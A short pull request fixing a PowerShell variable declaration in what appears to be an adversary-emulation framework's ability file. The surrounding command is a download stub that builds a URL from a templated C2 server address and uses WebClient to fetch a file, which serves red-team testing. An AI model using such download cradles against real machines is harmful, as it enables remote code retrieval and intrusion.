### PR TITLE
Add $ for declaring server variable in PowerShell

### DIFF
--- a/data/abilities/execution/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/execution/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -23,7 +23,7 @@
     windows:
       psh:
         command: |
-          server="#{app.redirect.http}";
+          $server="#{app.redirect.http}";
           $url="$server/file/download";
           $wc=New-Object System.Net.WebClient;
           $wc.Headers.add("platform","windows");


### PR DESCRIPTION
Add $ for declaring server variable in PowerShell. Not required for linux-sh or darwin-sh which I assume is where it was copied from.